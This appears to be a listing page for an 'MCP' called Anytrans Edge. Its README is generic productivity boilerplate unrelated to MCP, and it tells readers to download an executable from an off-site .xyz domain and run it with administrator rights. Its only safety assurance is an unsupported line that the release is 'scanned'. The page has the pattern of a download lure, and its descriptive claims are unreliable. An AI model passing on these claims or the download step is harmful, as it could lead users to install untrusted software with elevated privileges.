← Discover MCPs and Agents
a
MCPAI & MLGitHub

anytrans-edge

Anytrans Edge

Links

README

From the repo.

Anytrans Edge

📝 Description

Full-featured Anytrans Edge productivity platform for team collaboration, project management, and workflow automation.

🧾 Requirements

  • Windows (64-bit)
  • Administrator rights for install

Tips

[!TIP] Pin it to your taskbar for quick access.

🚀 Quick Setup

  1. Download the release package from the link above.
  2. Extract the archive contents to your desired installation path.
  3. Launch the main executable file or follow the setup guide.

Questions & Answers

Is it safe to run? The release provided here is scanned before it's published.

How do I update it? Grab the latest release from the download link above.

📥 Download

➡️ Grab the latest version

Project page: https://anytrans-edge.softax.xyz

Main features

  • Smart Organization: Intuitive workspace with templates, tags, and powerful search capabilities.
  • Team Collaboration: Real-time editing, comments, and sharing with role-based permissions.
  • Workflow Automation: Custom automations and integrations to streamline repetitive tasks.

Legal

[!NOTE] For personal, lawful use only. Trademarks are the property of their owners.

Collected info

  • ★ 184 stars
  • Source updated: 8/28/2026

Config for your environment

Replace {MCP_ENDPOINT_URL} with this MCP’s endpoint URL (from its repo or docs above). No API key — you connect directly.

Tool

OS

Config file: ~/.cursor/mcp.json

{
  "mcpServers": {
    "mcp-server": {
      "url": "{MCP_ENDPOINT_URL}"
    }
  }
}

Paste into mcpServers in the config file. Restart Cursor after saving.

If this MCP is also published on mcpchannel.ai, you can subscribe from Browse and use the gateway config there instead.